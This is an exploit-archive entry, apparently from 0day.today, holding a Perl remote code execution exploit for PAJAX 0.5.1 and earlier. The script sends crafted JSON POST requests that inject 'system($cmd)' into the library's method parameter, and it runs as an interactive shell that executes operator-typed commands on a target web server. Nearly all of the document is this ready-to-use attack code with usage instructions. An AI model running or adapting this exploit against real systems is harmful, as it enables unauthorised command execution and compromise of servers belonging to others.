PAJAX <= 0.5.1 Remote Code Execution Exploit

2006-04-13T00:00:00
ID 1337DAY-ID-356
Type zdt
Reporter Stoney
Modified 2006-04-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================
PAJAX <= 0.5.1 Remote Code Execution Exploit
============================================





#!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found
by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = <$sock>)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}



#  0day.today [2018-02-21]  #